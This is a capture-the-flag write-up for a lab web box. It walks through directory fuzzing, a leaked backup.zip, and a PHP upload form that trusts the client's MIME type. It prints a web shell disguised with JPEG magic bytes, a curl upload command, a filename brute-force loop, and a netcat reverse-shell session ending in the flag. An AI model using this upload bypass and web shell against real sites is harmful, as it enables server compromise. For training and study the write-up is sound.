Alzymer

This challenge focused on an web and sub directory. The vulnerability was explosed internal file, and the system with a writeable file and a CVE that use to PE

Alzymer

Recon

nmap

1
2
3
4
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.67 ((Debian))
|_http-title: Yekolo Temari College
|_http-server-header: Apache/2.4.67 (Debian

home-p.png

imag2.png

FFUF

1
2
3
4
5
6
index.php 
media     
uploads     
assets   
student.php  
.html       

i enumerate each director’s

1
2
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media/FUZZ  -ac -e .php,.html,.bak,.zip
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media//images/FUZZ  -ac -e .php,.html,.bak,.zip

index.html some interesting thing in the assets

1
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/assets/FUZZ  -ac -e .php,.html,.bak,.zip

backup.zip OK download it and extract the info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ wget http://uni.ctf/assets/backup.zip                            
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$ ls
backup.zip                                
┌──(neo㉿neo)-[~/uni-ctf/]
└─$ unzip backup.zip
Archive:  backup.zip
   creating: backup/
  inflating: backup/index.php        
  inflating: backup/student.php      
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$  cd backup && ls
index.php  student.php
┌──(neo㉿neo)-[~/uni-ctf/backup]
└─$ 

some thing we have now is the php procces

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ cat student.php
<?php
$message = '';
$status = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $name = trim($_POST['full_name'] ?? '');
    $email = trim($_POST['email'] ?? '');
    $department = trim($_POST['department'] ?? '');
    if (!isset($_FILES['student_image']) || $_FILES['student_image']['error'] !== UPLOAD_ERR_OK) {
        $message = 'Please upload your image.';
        $status = 'error';
    } else {
        $allowed = ['image/jpeg', 'image/png'];
        $type = $_FILES['student_image']['type'] ?? '';
        if (!in_array($type, $allowed, true)) {
            $message = 'Only PNG or JPEG requeired.';
            $status = 'error';
        } else {
            $uploadDir = __DIR__ . '/uploads/';
            if (!is_dir($uploadDir)) {
                mkdir($uploadDir, 0777, true);
            }
            $originalName = basename($_FILES['student_image']['name']);
            $random = str_pad((string)random_int(100, 999), 3, '0', STR_PAD_LEFT);
            $savedName = 'yekolo-temari-' . $random . $originalName;
            $target = $uploadDir . $savedName;
            if (move_uploaded_file($_FILES['student_image']['tmp_name'], $target)) {
                $message = 'Thank you for registration we will contact u with your email';
                $status = 'success';
            } else {
                $message = 'Upload failed. Try again later.';
                $status = 'error';
            }
        }
    }
}

From this code we understand the proccess is gose

  • Read form fields
  • Check upload exists
  • Check reported MIME type
  • Create uploads/ if needed
  • Rename file
  • Move uploaded file
  • Show success

shell.php

1
\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>
1
echo '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>' > shell.php
1
curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@shell.php;type=image/jpeg" http://uni.ctf/student.php
1
2
3
4
5
6
7
8
for i in $(seq 100 999); do                              
    url="http://uni.ctf/uploads/yekolo-temari-${i}shell.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done
1
[+] Found: http://uni.ctf/uploads/yekolo-temari-996shell.php

?cmd=id

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
─$ curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@pentest.php;type=image/jpeg"  http://uni.ctf/student.php                          
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Student Registration</title>
<style>
 body{font-family:Arial,sans-serif;background:#f8fafc;padding:30px;color:#1e293b}
 .wrap{max-width:780px;margin:0 auto;background:#fff;border-radius:16px;padding:28px;box-shadow:0 10px 30px rgba(0,0,0,.08)}
 label{display:block;margin:14px 0 8px;font-weight:700}
 input,select{width:100%;padding:12px;border:1px solid #cbd5e1;border-radius:10px}
 button{margin-top:18px;background:#2563eb;color:#fff;border:0;padding:12px 18px;border-radius:10px;cursor:pointer}
 .msg{margin-bottom:16px;padding:14px;border-radius:10px}
 .success{background:#dcfce7;color:#166534}
 .error{background:#fee2e2;color:#991b1b}
 a{color:#2563eb}
</style>
</head>
<body>
<div class="wrap">
  <h1>Yekolo Temari College Registration</h1>
  <p>Fill the form below and upload your passport-size photo.</p>
      <div class="msg success">Thank you for registration we will contact u with your email</div>
    <form method="POST" enctype="multipart/form-data">
    <label>Full Name</label>
    <input type="text" name="full_name" required>

    <label>Email</label>
    <input type="email" name="email" required>

    <label>Department</label>
    <select name="department" required>
      <option value="Computer Science">Computer Science</option>
      <option value="Civil Engineering">Civil Engineering</option>
      <option value="Business Management">Business Management</option>
      <option value="Nursing">Nursing</option>
      <option value="CyberSecurity">CyberSecurity</option>
    </select>

    <label>Profile Image (JPEG or PNG)</label>
    <input type="file" name="student_image" required>

    <button type="submit">Submit Registration</button>
  </form>
  <p style="margin-top:20px"><a href="/index.php">Back to homepage</a></p>
</div>
</body>
</html>
                                                                                                                                                                        
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do                                                                                 
    url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done
^C                                                                                                                                                                        
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do                              
    url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    if [ "$code" = "200" ]; then
        echo "[+] Found: $url"
        break
    fi
done


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.8] 34012
Linux 49e853df1514 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux
 01:08:30 up 22:38,  0 users,  load average: 0.34, 0.37, 0.34
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
dev
etc
flag.txt
home
...
var
$ cat flag.txt	
unictf{Br34king_TH3_rul3s}
This post is licensed under CC BY 4.0 by the author.